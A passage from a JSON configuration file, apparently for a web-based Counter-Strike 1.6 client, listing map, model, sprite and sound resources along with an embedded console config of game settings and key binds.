"/wad/fy_msk_centr/fy_airsoft.wad": 30,
"models/player/t-model-ek/t-model-ek.mdl": 35,
"/wad/ctf_crossfire/halflife.wad": 29,
"models/p_mp5.mdl": 35,
"models/w_mp5.mdl": 35,
"models/w_glock18.mdl": 35,
"/wad/dz_slimi/de_piranesi.wad": 29,
"/wad/dz_slimi/halflife.wad": 29,
"/wad/dz_slimi/torntextures.wad": 29,
"/wad/dz_slimi/random.wad": 29,
"/wad/dz_slimi/sot.wad": 29,
"models/player/ct-model-ww2_v2/ct-model-ww2_v2.mdl": 36,
"/wad/cs_docks/liquids.wad": 30,
"/wad/awp_puertomadero/liquids.wad": 29,
"models/w_hegrenade.mdl": 39,
"sprites/surf_lunarlanding/flare1.spr": 36,
"sprites/surf_lunarlanding/flame.spr": 36,
"sprites/surf_lunarlanding/sub_floater2.spr": 36,
"models/player/shop_ct8/shop_ct8.mdl": 38,
"sprites/shadow_circle.spr": 36,
"/wad/he_neighborhood/wad1.wad": 30,
"models/knives/v_41_knife.mdl": 35,
"models/player/shop_t7/shop_t7.mdl": 40,
"models/player/shop_t8/shop_t8.mdl": 42,
"models/player/shop_ct9/shop_ct9.mdl": 47,
"models/knives/p_54_knife.mdl": 39,
"models/knives/v_53_knife.mdl": 35,
"/wad/dz_slimi/chateau.wad": 30,
"models/knives/v_40_knife.mdl": 38,
"models/w_usp.mdl": 36,
"models/p_usp.mdl": 36,
"models/p_hegrenade.mdl": 39,
"models/v_hegrenade.mdl": 40,
"models/p_c4.mdl": 39,
"models/v_mp5.mdl": 37,
"gg_inferno.bsp": 38,
"models/v_c4.mdl": 39,
"de_dust_assault.bsp": 38,
"evil_knife/knife_slash1.wav": 20,
"weapons/explode3.wav": 37,
"weapons/explode4.wav": 37,
"weapons/explode5.wav": 37,
"warcraft3/divineshield.wav": 21,
"evil_knife/knife_hitwall1.wav": 20,
"blockmaker/joker.wav": 21,
"weapons/deagle-2.wav": 23,
"weapons/deagle-1.wav": 23,
"weapons/de_deploy.wav": 23,
"weapons/de_clipout.wav": 23,
"weapons/de_clipin.wav": 23,
"evil_knife/knife_deploy1.wav": 20,
"evil_knife/knife_stab.wav": 20,
"evil_knife/knife_hit4.wav": 20,
"evil_knife/knife_hit3.wav": 20,
"evil_knife/knife_hit2.wav": 20,
"evil_knife/knife_hit1.wav": 20,
"Ambience/waterfall1.wav": 18,
"Ambience/waterfall3.wav": 18,
"Doors/aliendoor3.wav": 18,
"surf_lunarlanding/wind3.wav": 18,
"/wad/bhop_kzeed_prohop/wad1.wad": 31,
"models/player/shop_ct3/shop_ct3.mdl": 39,
"/wad/de_prodigy/halflife.wad": 30,
"models/adv/chick.mdl": 40,
"gfx/env/badlandsbk.tga": 35,
"models/Skatepark/icon.mdl": 35,
"models/Skatepark/chien_c4.mdl": 36,
"/wad/de_prodigy/cstrike.wad": 30,
"/wad/de_prodigy/prodigy.wad": 30,
"models/knives/p_3_knife.mdl": 35,
"/wad/de_azteced/liquids.wad": 30,
"models/mishura/name1.mdl": 36,
"models/mishura/name14.mdl": 36,
"models/mishura/name13.mdl": 36,
"models/mishura/name2.mdl": 35,
"models/mishura/name3.mdl": 35,
"models/mishura/name4.mdl": 35,
"models/mishura/name5.mdl": 35,
"models/mishura/name6.mdl": 35,
"models/mishura/name7.mdl": 35,
"models/mishura/name8.mdl": 35,
"models/mishura/name9.mdl": 35,
"models/mishura/name10.mdl": 35,
"models/mishura/name11.mdl": 35,
"models/mishura/name12.mdl": 35,
"models/mishura/shop_mdl.mdl": 36,
"models/knives/p_42_knife.mdl": 35,
"models/knives/p_43_knife.mdl": 35,
"models/knives/p_48_knife.mdl": 35,
"models/p_m4a1.mdl": 35,
"models/player/shop_t10/shop_t10.mdl": 44,
"models/player/shop_t2/shop_t2.mdl": 39,
"models/player/shop_ct10/shop_ct10.mdl": 38,
"models/player/shop_ct7/shop_ct7.mdl": 38,
"models/knives/p_53_knife.mdl": 36,
"/wad/awp_india__nav72_go/awp_india_go.wad": 30,
"prites/gas_puff_gray_opaque.spr": 35,
"models/w_m4a1.mdl": 35,
"models/v_tmp.mdl": 37,
"models/v_m4a1.mdl": 37,
"/wad/cs_hdb/cs_assault.wad": 30,
"/wad/cs_hdb/cstrike.wad": 30,
"/wad/cs_hdb/halflife.wad": 30,
"/wad/he_glass2/cs_dust.wad": 30,
"/wad/he_glass2/halflife.wad": 30,
"/wad/he_glass2/xeno.wad": 30,
"/wad/he_glass2/cstrike.wad": 30,
"models/knives/v_56_knife.mdl": 1,
"sprites/gas_puff_01.spr": 38,
"models/knives/p_64_knife.mdl": 36,
"models/shield/p_shield_usp.mdl": 35,
"de_dust3_css.bsp": 35,
"gfx/env/badlandsdn.tga": 35,
"gfx/env/badlandsft.tga": 35,
"gfx/env/badlandslf.tga": 35,
"gfx/env/badlandsrt.tga": 35,
"gfx/env/badlandsup.tga": 35,
"gfx/env/desup.tga": 36,
"models/de_parikia/de_parikia_v1.mdl": 6,
"sprites/de_parikia/glow_light.spr": 6,
"models/v_m3.mdl": 40,
"models/octoberfest/p_m4a1.mdl": 38,
"models/octoberfest/v_m4a1.mdl": 39,
"models/chicks/Coins.mdl": 36,
"models/chick.mdl": 46,
"de_parikia_b1.bsp": 6,
"plats/vehicle4.wav": 19,
"cs_assault_rifles.bsp": 38,
"models/knives/p_59_knife.mdl": 2,
"gg_simpsons.bsp": 37,
"misc/killChicken.wav": 22,
"models/feather.mdl": 37,
"models/wwii/p_2_p90.mdl": 35,
"/wad/de_dust_mini2/cached.wad": 31,
"/wad/de_dust_mini2/cs_747.wad": 31,
"/wad/de_dust_mini2/cs_assault.wad": 31,
"/wad/de_dust_mini2/cs_bdog.wad": 31,
"/wad/de_dust_mini2/cs_cbble.wad": 31,
"models/v_aug.mdl": 36,
"models/v_awp.mdl": 36,
"models/v_elite.mdl": 36,
"models/v_famas.mdl": 36,
"models/v_fiveseven.mdl": 36,
"models/v_g3sg1.mdl": 36,
"models/v_galil.mdl": 36,
"models/v_m249.mdl": 36,
"/wad/de_dust_mini2/cs_havana.wad": 31,
"/wad/de_dust_mini2/cs_office.wad": 31,
"models/v_p228.mdl": 36,
"models/v_p90.mdl": 36,
"models/v_scout.mdl": 36,
"models/v_sg550.mdl": 36,
"models/v_sg552.mdl": 36,
"models/v_shield_r.mdl": 36,
"/wad/de_dust_mini2/cstraining.wad": 31,
"models/v_ump45.mdl": 36,
"models/v_xm1014.mdl": 36,
"models/v_flashbang.mdl": 37,
"models/v_smokegrenade.mdl": 37,
"models/w_thighpack.mdl": 36,
"models/p_flashbang.mdl": 36,
"models/p_smokegrenade.mdl": 36,
"models/w_c4.mdl": 39,
"models/w_flashbang.mdl": 36,
"models/w_smokegrenade.mdl": 36,
"/wad/de_dust_mini2/de_airstrip.wad": 31,
"/wad/de_dust_mini2/de_aztec.wad": 31,
"/wad/de_dust_mini2/de_piranesi.wad": 31,
"models/props/skeleton.mdl": 37,
"cs_arabstreets.bsp": 6,
"sprites/de_giza/Steam.spr": 37,
"sprites/de_giza/Glow_Sun.spr": 37,
"sprites/de_giza/Fire.spr": 37,
"models/de_giza/Gator.mdl": 37,
"models/de_giza/Fish_1.mdl": 37,
"models/de_giza/Fish.mdl": 37,
"models/de_giza/de_giza_v1.mdl": 37,
"models/de_giza/Cobra.mdl": 37,
"/wad/de_dust_mini2/de_vertigo.wad": 31,
"/wad/de_dust_mini2/itsitaly.wad": 31,
"/wad/de_dust_mini2/n0th1ng.wad": 31,
"/wad/de_dust_mini2/ajawad.wad": 31,
"/wad/de_dust_mini2/cstrike.wad": 31,
"models/mishura/m1.mdl": 57,
"models/mishura/m2.mdl": 57,
"gfx/env/desdn.tga": 36,
"models/mishura/h-point.mdl": 45,
"ambience/flies.wav": 2,
"ambience/industrial4.wav": 2,
"ambience/de_747_radio.wav": 38,
"ambience/de_747_dusty.wav": 38,
"models/knives/v_59_knife.mdl": 2,
"models/de_giza/CamelSit.mdl": 37,
"models/de_giza/Camel.mdl": 37,
"misc/kiss.wav": 18,
"models/adh_horse.mdl": 36,
"models/bush_shrubv01.mdl": 36,
"models/skeleton.mdl": 37,
"de_giza_b4": 8,
"models/knives/p_57_knife.mdl": 4,
"models/knives/v_57_knife.mdl": 4,
"models/knives/v_32_knife.mdl": 37,
"models/knives/p_62_knife.mdl": 38,
"models/wwii/v_2_p90.mdl": 35,
"models/knives/v_61_knife.mdl": 39,
"models/knives/p_61_knife.mdl": 39,
"fy_deathmatch.bsp": 38,
"models/knives/v_62_knife.mdl": 38,
"models/knives/v_63_knife.mdl": 39,
"models/knives/p_63_knife.mdl": 39,
"de_dust2_santorini_b2.bsp": 35,
"sprites/de_dust2_santorini/Glow_Sun.spr": 35,
"weapons/1911/Draw.wav": 40,
"gfx/env/hdbup.tga": 36,
"gfx/env/hdbrt.tga": 36,
"gfx/env/hdblf.tga": 36,
"gfx/env/hdbft.tga": 36,
"gfx/env/hdbdn.tga": 36,
"gfx/env/3dm747Bk.tga": 38,
"gfx/env/3dm747Dn.tga": 38,
"gfx/env/3dm747Ft.tga": 38,
"gfx/env/3dm747Lf.tga": 38,
"gfx/env/3dm747Rt.tga": 38,
"gfx/env/3dm747Up.tga": 38,
"gfx/env/hdbbk.tga": 36,
"models/p_ak47.mdl": 43,
"gfx/env/hdb_rt.tga": 36,
"de_747.bsp": 39,
"models/de_dust2_santorini/Whabun_2.mdl": 35,
"models/de_dust2_santorini/Whabun_1.mdl": 35,
"models/de_dust2_santorini/Tree.mdl": 35,
"models/knives/v_64_knife.mdl": 36,
"models/de_dust2_santorini/Longchair_1.mdl": 35,
"de_dust2_md.bsp": 38,
"/wad/de_dust2_md/de_inferno.wad": 38,
"/wad/de_dust2_md/de_barcelona.wad": 38,
"/wad/de_dust2_md/de_dust2_definitive.wad": 38,
"/wad/de_dust2_md/chateau.wad": 38,
"/wad/de_dust2_md/cs_747.wad": 38,
"/wad/de_dust2_md/cs_cbble.wad": 38,
"/wad/de_dust2_md/cs_dust.wad": 38,
"/wad/de_dust2_md/cstrike.wad": 38,
"/wad/de_dust2_md/de_piranesi.wad": 38,
"/wad/de_dust2_md/de_storm.wad": 38,
"/wad/de_dust2_md/halflife.wad": 38,
"/wad/de_dust2_md/itsitaly.wad": 38,
"models/knives/p_60_knife.mdl": 39,
"models/knives/v_60_knife.mdl": 39,
"models/de_dust2_santorini/Jong.mdl": 35,
"models/de_dust2_santorini/Houseup_3.mdl": 35,
"models/de_dust2_santorini/Houseup_1.mdl": 35,
"models/de_dust2_santorini/Chair.mdl": 35,
"models/de_dust2_santorini/Bird_1.mdl": 35,
"models/de_dust2_santorini/Big_Tree.mdl": 35,
"gfx/env/san_up.tga": 35,
"gfx/env/san_rt.tga": 35,
"gfx/env/san_lf.tga": 35,
"gfx/env/san_ft.tga": 35,
"gfx/env/san_dn.tga": 35,
"gfx/env/san_bk.tga": 35,
"models/de_dust2_santorini/Tableset.mdl": 35,
"models/mishura/b_place.mdl": 46,
"models/mishura/a1.mdl": 35,
"models/mishura/b1.mdl": 35,
"plats/ufo4.wav": 19,
"models/knives/p_65_knife.mdl": 37,
"models/knives/v_65_knife.mdl": 38,
"models/player/shop_ct11/shop_ct11.mdl": 35,
"models/player/shop_t11/shop_t11.mdl": 35,
"misc/comeon.wav": 20,
"misc/lol.wav": 19,
"fy_new_pool_day2.bsp": 35,
"gg_new_pool_day2.bsp": 35,
"surf_lunarlanding/dronemachine2.wav": 18,
"surf_lunarlanding/fire.wav": 18,
"surf_lunarlanding/alien_cycletone.wav": 18,
"Skatepark/gadget1.wav": 18,
"de_parikia/seashore.wav": 6,
"de_parikia/ambience.wav": 6,
"de_parikia/kotelnia.wav": 6,
"de_parikia/ahhuhh.wav": 6,
"de_parikia/horror.wav": 6,
"de_parikia/aaaaa.wav": 7,
"ambience/3dmstart.wav": 15,
"ambience/dog4.wav": 2,
"doors/doormove5.wav": 3,
"doors/doormove8.wav": 3,
"doors/doormove3.wav": 5,
"doors/doorstop5.wav": 2,
"ambience/steamjet1.wav": 2,
"de_giza/Wind.wav": 37,
"ambience/de_747_drone.wav": 38,
"ambience/de_747_dog.wav": 38,
"de_dust2_santorini/Seashore.wav": 17,
"de_dust2_santorini/Birds_4.wav": 17,
"de_dust2_santorini/Birds_3.wav": 17,
"de_dust2_santorini/Bell.wav": 17,
"CS_BattleRoyale_Sounds/Parachute_Deploy.wav": 18,
"de_giza/Water.wav": 37,
"de_giza/Drips.wav": 37,
"de_giza/Burn.wav": 37,
"ambience/de_747_win.wav": 38,
"ambience/de_747_turbu.wav": 38,
"ambience/de_747_sucks.wav": 38,
"misc/nan.wav": 18,
"gfx/env/awp_maprt.tga": 36,
"gfx/env/pp_bk.tga": 36,
"gfx/env/pp_dn.tga": 36,
"gfx/env/pp_ft.tga": 36,
"gfx/env/pp_lf.tga": 36,
"gfx/env/pp_rt.tga": 36,
"gfx/env/pp_up.tga": 36,
"models/p_mac10.mdl": 42,
"models/v_ak47.mdl": 44,
"models/v_deagle.mdl": 51,
"models/v_glock18.mdl": 42,
"models/v_mac10.mdl": 41,
"models/w_ak47.mdl": 42,
"models/w_deagle.mdl": 45,
"models/w_mac10.mdl": 42,
"sprites/emoji/hud_emotions1.spr": 48,
"models/v_knife_r.mdl": 38
},
"modelList": [
"models/chick.mdl",
"models/chicks/Coins.mdl",
"models/fleshgibs.mdl",
"models/backweapons.mdl",
"models/scientist.mdl",
"models/scientist01.mdl",
"models/scientist02.mdl",
"models/scientist03.mdl",
"models/scientist04.mdl",
"models/scientist05.mdl",
"models/scientist06.mdl",
"models/scientist07.mdl",
"models/scientistt.mdl",
"models/woodgibs.mdl",
"models/computergibs.mdl",
"models/metalplategibs.mdl",
"models/hostage.mdl",
"models/hostage01.mdl",
"models/hostage02.mdl",
"models/hostage03.mdl",
"models/hostage04.mdl",
"models/hostage05.mdl",
"models/hostage06.mdl",
"models/hostage07.mdl",
"models/hostage08.mdl",
"models/mechgibs.mdl",
"models/w_kevlar.mdl",
"models/w_battery.mdl",
"models/w_antidote.mdl",
"models/w_security.mdl",
"models/w_longjump.mdl",
"models/w_assault.mdl",
"models/w_thighpack.mdl",
"models/rshell_big.mdl",
"models/w_9mmclip.mdl",
"models/rshell.mdl",
"models/shotgunshell.mdl",
"models/w_shotbox.mdl",
"models/pshell.mdl",
"models/w_backpack.mdl",
"models/w_weaponbox.mdl",
"models/grenade.mdl",
"models/player.mdl",
"models/player/leet/leet.mdl",
"models/player/gign/gign.mdl",
"models/player/vip/vip.mdl",
"models/rpgrocket.mdl",
"models/hgibs.mdl",
"models/agibs.mdl",
"models/mil_crategibs.mdl",
"models/glassgibs.mdl",
"sprites/voiceicon.spr",
"sprites/zerogxplode.spr",
"sprites/WXplo1.spr",
"sprites/steam1.spr",
"sprites/bubble.spr",
"sprites/smokepuff.spr",
"sprites/eexplo.spr",
"sprites/fexplo.spr",
"sprites/fexplo1.spr",
"sprites/radio.spr",
"sprites/b-tele1.spr",
"sprites/c-tele1.spr",
"sprites/ledglow.spr",
"sprites/laserbeam.spr",
"sprites/laserdot.spr",
"sprites/explode1.spr",
"sprites/shadow_circle.spr",
"sprites/wall_puff1.spr",
"sprites/wall_puff2.spr",
"sprites/wall_puff3.spr",
"sprites/wall_puff4.spr",
"sprites/black_smoke1.spr",
"sprites/black_smoke2.spr",
"sprites/black_smoke3.spr",
"sprites/black_smoke4.spr",
"sprites/fast_wallpuff1.spr",
"sprites/pistol_smoke1.spr",
"sprites/pistol_smoke2.spr",
"sprites/rifle_smoke1.spr",
"sprites/rifle_smoke2.spr",
"sprites/rifle_smoke3.spr",
"sprites/smoke.spr",
"sprites/muzzleflash.spr",
"sprites/muzzleflash1.spr",
"sprites/muzzleflash2.spr",
"sprites/muzzleflash3.spr",
"sprites/animglow01.spr",
"sprites/richo1.spr",
"sprites/3dmflaora.spr",
"sprites/3dmflared.spr",
"sprites/640hud1.spr",
"sprites/640hud2.spr",
"sprites/640hud3.spr",
"sprites/640hud4.spr",
"sprites/640hud5.spr",
"sprites/640hud6.spr",
"sprites/640hud7.spr",
"sprites/640hud10.spr",
"sprites/640hud11.spr",
"sprites/640hud12.spr",
"sprites/640hud13.spr",
"sprites/640hud14.spr",
"sprites/640hud15.spr",
"sprites/640hud16.spr",
"sprites/640hud17.spr",
"sprites/640hud18.spr",
"sprites/640hud19.spr",
"sprites/640hud20.spr",
"sprites/black_smoke1.spr",
"sprites/black_smoke2.spr",
"sprites/black_smoke3.spr",
"sprites/black_smoke4.spr",
"sprites/c4.spr",
"sprites/dot.spr",
"sprites/ch_sniper.spr",
"sprites/ch_sniper2.spr",
"sprites/defuser.spr",
"sprites/fast_wallpuff1.spr",
"sprites/gas_puff_01.spr",
"sprites/grass_01.spr",
"sprites/grass_03.spr",
"sprites/hud.txt",
"sprites/ibackpack.spr",
"sprites/ic4.spr",
"sprites/ihostage.spr",
"sprites/ikgrass1.spr",
"sprites/ikgrass2.spr",
"sprites/ikgrass3.spr",
"sprites/ikgrass4.spr",
"sprites/ikgrass5.spr",
"sprites/iplayerc4.spr",
"sprites/iplayervip.spr",
"sprites/ledglow.spr",
"sprites/left.spr",
"sprites/left2.spr",
"sprites/muzzleflash1.spr",
"sprites/muzzleflash2.spr",
"sprites/muzzleflash3.spr",
"sprites/muzzleflash4.spr",
"sprites/observer.txt",
"sprites/pistol_smoke1.spr",
"sprites/pistol_smoke2.spr",
"sprites/radar320.spr",
"sprites/radar640.spr",
"sprites/radaropaque640.spr",
"sprites/radio.spr",
"sprites/rifle_smoke1.spr",
"sprites/rifle_smoke2.spr",
"sprites/rifle_smoke3.spr",
"sprites/scope_arc.tga",
"sprites/scope_arc_ne.tga",
"sprites/scope_arc_nw.tga",
"sprites/scope_arc_sw.tga",
"sprites/shadow_circle.spr",
"sprites/smokepuff.spr",
"sprites/sniper_scope.spr",
"sprites/snow.spr",
"sprites/wall_puff1.spr",
"sprites/wall_puff2.spr",
"sprites/wall_puff3.spr",
"sprites/wall_puff4.spr",
"sprites/lgtning.spr",
"sprites/640_pain.spr",
"sprites/shockwave.spr",
"models/w_medkit.mdl",
"models/mishura/m1.mdl",
"models/mishura/m2.mdl",
"models/mishura/m3.mdl",
"models/mishura/a1.mdl",
"models/mishura/b1.mdl",
"models/mishura/arrow.mdl",
"models/mishura/h-point.mdl",
"models/mishura/b_place.mdl",
"models/mishura/v-point.mdl",
"models/mishura/plaster2.mdl",
"models/v_knife.mdl",
"models/v_knife_r.mdl",
"models/w_knife.mdl",
"models/p_knife.mdl",
"models/v_c4.mdl",
"models/w_c4.mdl",
"models/p_c4.mdl"
],
"net_optimization": "true",
"config": "unbindall\nsetinfo \"_vgui_menus\" \"1\"\nsetinfo \"_ah\" \"1\"\n+mlook\n+jlook\nhidescoreboard2\ncl_predict \"1\"\n_cl_autowepswitch \"1\"\n_snd_mixahead \"0.1\"\nati_npatch \"1\"\nbgmvolume \"1\"\nbottomcolor \"6\"\nbrightness \"1\"\nd_spriteskip \"1\"\nd_mipscale \"3\"\ncl_allowdownload \"1\"\ncl_allowupload \"1\"\ncl_backspeed \"400\"\ncl_cmdbackup \"2\"\ncl_cmdrate \"60\"\ncl_corpsestay \"0\"\ncl_crosshair_color \"50 250 50\"\ncl_dlmax \"512\"\ncl_download_ingame \"1\"\ncl_forwardspeed \"400\"\ncl_himodels \"0\"\ncl_idealpitchscale \"0.8\"\ncl_lc \"1\"\ncl_logocolor \"#Valve_Orange\"\ncl_logofile \"lambda\"\ncl_lw \"1\"\ncl_smoothime \"0.1\"\ncl_min_ct \"2\"\ncl_min_t \"1\"\ncl_mousegrab \"1\"\ncl_radartype \"0\"\ncl_righthand \"1\"\ncl_sidespeed \"400\"\ncl_updaterate \"60\"\ncl_vsmoothing \"0\"\ncl_weather \"0\"\ngl_clear \"0\"\ncon_color \"255 180 30\"\nconsole \"0\"\ncrosshair \"1\"\nfastsprites \"0\"\ngl_ztrick \"1\"\ngl_spriteblend \"0\"\nfps_max \"999\"\ngamma \"5\"\ngl_dither \"0\"\ngl_flipmatrix \"0\"\ngl_monolights \"0\"\ngl_overbright \"0\"\ngl_polyoffset \"4\"\ngl_vsync \"0\"\nmax_smokepuffs \"0\"\nr_decals \"0\"\nhisound \"1\"\nhpk_maxsize \"4\"\nhud_capturemouse \"1\"\nhud_draw \"1\"\nhud_saytext_internal \"1\"\nhud_takesshots \"0\"\njoystick \"0\"\nlookspring \"0.0\"\nlookstrafe \"0.0\"\nm_customaccel \"0\"\nm_customaccel_exponent \"1\"\nm_customaccel_max \"0\"\nm_customaccel_scale \"0.04\"\nm_filter \"0\"\nm_forward \"1\"\nm_mousethread_sleep \"10\"\nm_pitch \"0.022\"\nm_rawinput \"0\"\nm_side \"0.8\"\nm_yaw \"0.022\"\nmodel \"gordon\"\nMP3FadeTime \"2.0\"\nMP3Volume \"0.8\"\nname \"_____SOVIET\"\nnet_graph \"0\"\nnet_graphpos \"1\"\nnet_scale \"5\"\ngunsmoke \"0\"\nsensitivity \"3\"\nskin \"\"\nspec_autodirector_internal \"1\"\nspec_drawcone_internal \"1\"\nspec_drawnames_internal \"1\"\nspec_drawstatus_internal \"1\"\nspec_mode_internal \"1\"\nspec_pip \"0\"\nsuitvolume \"0.25\"\nsv_aim \"1\"\nsv_voiceenable \"1\"\nteam \"\"\ntopcolor \"30\"\nviewsize \"120.0\"\nvoice_enable \"1\"\nvoice_forcemicrecord \"1\"\nvoice_modenable \"1\"\nvoice_scale \"0.75\"\nlightgamma \"1\"\nviolence_ablood \"0\"\nviolence_agibs \"0\"\nviolence_hblood \"0\"\nviolence_hgibs \"0\"\ngl_cull \"1\"\ngl_ansio \"0\"\ngl_fog \"0\"\nlook_filter \"1\"\ncon_fontscale \"1\"\nhud_deathnotice_time \"0\"\nshowscoreboard2 \"0\"\ncon_fontsize \"0\"\nr_detailtextures \"1\"\ngl_max_size \"512\"\ncl_movespeedkey \"0.52\"\nhud_fastswitch \"1\"\nmp_decals \"0\"\ncl_shadows \"0\"\ndeveloper \"1\"\nfps_override \"1\"\ncl_nopred \"0\"\nmax_shells \"0\"\ncl_dynamiccrosshair \"0\"\ncl_crosshair_translucent \"0\"\nr_lighting_extended \"0\"\nhand \"1\"\nbind ' \"+moveup\"\nbind \\ \"+movedown\"\nbind ; \"+mlook\"\nbind = \"sizeup\"\nbind ALT \"+strafe\"\nbind INS \"+klook\"\nbind PGDN \"+lookdown\"\nbind PGUP \"+lookup\"\nbind END \"force_centerview\"\nblood \"0\"\nhand2 \"1\"\ndecals \"0\"\nvolume \"0.8\"\nfeedback \"1\"\nsensivity \"3\"\nchat_enable \"1\"\ncl_bobcycle \"0.8\"\nmotd_enable \"1\"\ncl_minmodels \"1\"\nswitch_sound \"0\"\nnotifications \"1\"\ninverted-mouse \"0\"\nstretch_canvas \"1\"\nvoice_chat_off \"0\"\nr_drawviewmodel \"1\"\nnet_optimization \"1\"\ncl_crosshair_size \"medium\"\nzoom_sensitivity_ratio \"1.2\"\nbind c \"+duck\"\nbind TAB \"+showscores\"\nbind MOUSE1 \"+attack\"\nbind ESCAPE \"cancelselect\"\nbind SPACE \"+jump\"\nbind , \"buyammo1\"\nbind . \"buyammo2\"\nbind a \"+moveleft\"\nbind b \"buy\"\nbind d \"+moveright\"\nbind e \"+use\"\nbind f \"impulse 100\"\nbind g \"drop\"\nbind o \"buyequip\"\nbind q \"lastinv\"\nbind r \"+reload\"\nbind s \"+back\"\nbind t \"impulse 201\"\nbind w \"+forward\"\nbind LEFTARROW \"+left\"\nbind RIGHTARROW \"+right\"\nbind SHIFT \"+speed\"\nbind MOUSE2 \"+attack2\"\nbind h \"inspect\"\nbind z \"radioa\"\nbind x \"radiob\"\nbind v \"radioc\"\nbind CTRL \"+duck\"\nbind DOWNARROW \"+back\"\nbind UPARROW \"+forward\"\nbind ENTER \"+attack\"\nvid_mode 17",
"wheel": true,
"commands": {
"buyequip": 79,
"cancelselect": 27,
"+reload": 82,
"buy": 66,
"chooseteam": 77,
"+showscores": 9,
"messagemode": 89,
"messagemode2": 85
},
"hack_cvars": {
"canvas_width": "100",
"resources_dir_players": "/rez/",
"resources_dir_weapons": "/rez/",
"wheel_jump_everywhere": "0",
"resources_dir": null,
"resources_dir_sound": null,
"resources_dir_sounds": "/rez/",
"knife_model": null,
"hud_centerid": "0",
"tr_model": "5",
"ct_model": "5",
"fireinhole": "1",
"grenadechat_enable": "1",
"country_hide": "0",
"statsx_enable": "1"
},
"modelListWeapon": [
"models/p_m4a1.mdl",
"models/w_m4a1.mdl",
"models/v_m4a1.mdl",
"models/p_ak47.mdl",
"models/w_ak47.mdl",
"models/v_ak47.mdl",
"models/p_usp.mdl",
"models/w_usp.mdl",
"models/v_usp.mdl",
"models/p_awp.mdl",
"models/w_awp.mdl",
"models/v_awp.mdl",
"models/p_hegrenade.mdl",
"models/w_hegrenade.mdl",
"models/v_hegrenade.mdl",
"models/p_flashbang.mdl",
"models/w_flashbang.mdl",
"models/v_flashbang.mdl",
"models/p_smokegrenade.mdl",
"models/w_smokegrenade.mdl",
"models/v_smokegrenade.mdl",
"models/p_glock18.mdl",
"models/w_glock18.mdl",
"models/v_glock18.mdl",
"models/p_mp5.mdl",
"models/w_mp5.mdl",
"models/v_mp5.mdl",
"models/p_xm1014.mdl",
"models/w_xm1014.mdl",
"models/v_xm1014.mdl",
"models/p_aug.mdl",
"models/w_aug.mdl",
"models/v_aug.mdl",
"models/p_deagle.mdl",
"models/w_deagle.mdl",
"models/v_deagle.mdl",
"models/p_sg552.mdl",
"models/w_sg552.mdl",
"models/v_sg552.mdl",
"models/p_m3.mdl",
"models/w_m3.mdl",
"models/v_m3.mdl",
"models/p_p90.mdl",
"models/w_p90.mdl",
"models/v_p90.mdl",
"models/p_ump45.mdl",
"models/w_ump45.mdl",
"models/v_ump45.mdl",
"models/p_galil.mdl",
"models/w_galil.mdl",
"models/v_galil.mdl",
"models/p_sg550.mdl",
"models/w_sg550.mdl",
"models/v_sg550.mdl",
"models/p_m249.mdl",
"models/w_m249.mdl",
"models/v_m249.mdl",
"models/p_tmp.mdl",
"models/w_tmp.mdl",
"models/v_tmp.mdl",
"models/p_scout.mdl",
"models/w_scout.mdl",
"models/v_scout.mdl",
"models/p_mac10.mdl",
"models/w_mac10.mdl",
"models/v_mac10.mdl",
"models/p_famas.mdl",
"models/w_famas.mdl",
"models/v_famas.mdl",
"models/p_g3sg1.mdl",
"models/w_g3sg1.mdl",
"models/v_g3sg1.mdl",
"models/p_p228.mdl",
"models/w_p228.mdl",
"models/v_p228.mdl",
"models/p_fiveseven.mdl",
"models/w_fiveseven.mdl",
"models/v_fiveseven.mdl",
"models/p_elite.mdl",
"models/w_elite.mdl",
"models/v_elite.mdl",
"models/p_c4.mdl",
"models/w_c4.mdl",
"models/v_c4.mdl"
],
"soundList": [
"misc/killChicken.wav",
"misc/Coins.wav",
"radio/bombpl.wav",
"radio/blow.wav",
"radio/bombdef.wav",
"radio/clear.wav",
"radio/com_followcom.wav",
"radio/com_getinpos.wav",
"radio/com_go.wav",
"radio/com_reportin.wav",
"radio/ct_affirm.wav",
"radio/ct_backup.wav",
"radio/ct_coverme.wav",
"radio/ct_enemys.wav",
"radio/ct_inpos.wav",
"radio/ct_reportingin.wav",
"radio/ctwin.wav",
"radio/enemydown.wav",
"radio/fallback.wav",
"radio/fireassis.wav",
"radio/followme.wav",
"radio/getout.wav",
"radio/go.wav",
"radio/hitassist.wav",
"radio/hosdown.wav",
"radio/letsgo.wav",
"radio/locknload.wav",
"radio/matedown.wav",
"radio/moveout.wav",
"radio/negative.wav",
"radio/position.wav",
"radio/regroup.wav",
"radio/rescued.wav",
"radio/roger.wav",
"radio/rounddraw.wav",
"radio/sticktog.wav",
"radio/stormfront.wav",
"radio/takepoint.wav",
"radio/terwin.wav",
"radio/vip.wav",
"ambience/quail1.wav",
"ambience/thunder_clap.wav",
"ambience/rain.wav",
"buttons/bell1.wav",
"buttons/blip1.wav",
"buttons/blip2.wav",
"buttons/button8.wav",
"buttons/button9.wav",
"buttons/button11.wav",
"buttons/latchunlocked2.wav",
"buttons/lightswitch2.wav",
"buttons/spark5.wav",
"buttons/spark6.wav",
"common/bodydrop3.wav",
"common/bodydrop4.wav",
"common/bodysplat.wav",
"common/npc_step1.wav",
"common/npc_step2.wav",
"common/npc_step3.wav",
"common/npc_step4.wav",
"common/null.wav",
"common/wpn_denyselect.wav",
"common/wpn_hudoff.wav",
"common/wpn_hudon.wav",
"common/wpn_moveselect.wav",
"common/wpn_select.wav",
"debris/bustmetal1.wav",
"debris/bustmetal2.wav",
"debris/glass1.wav",
"debris/glass2.wav",
"debris/glass3.wav",
"debris/metal1.wav",
"debris/metal2.wav",
"debris/metal3.wav",
"debris/wood1.wav",
"debris/wood2.wav",
"debris/wood3.wav",
"debris/bustconcrete1.wav",
"debris/bustconcrete2.wav",
"debris/bustcrate1.wav",
"debris/bustcrate2.wav",
"debris/bustglass1.wav",
"debris/concrete1.wav",
"debris/concrete2.wav",
"debris/concrete3.wav",
"debris/pushbox1.wav",
"debris/pushbox2.wav",
"debris/pushbox3.wav",
"doors/doormove2.wav",
"doors/doormove6.wav",
"doors/doormove9.wav",
"doors/doormove10.wav",
"doors/doorstop3.wav",
"doors/doorstop4.wav",
"events/enemy_died.wav",
"events/friend_died.wav",
"events/task_complete.wav",
"events/tutor_msg.wav",
"gungame/takenlead.wav",
"gungame/gungame2.wav",
"gungame/smb3_powerup.wav",
"gungame/smb3_powerdown.wav",
"gungame/smb_star.wav",
"gungame/lostlead.wav",
"gungame/smb3_1-up.wav",
"gungame/knife_level.wav",
"gungame/nade_level.wav",
"gungame/brass_bell_C.wav",
"gungame/tiedlead.wav",
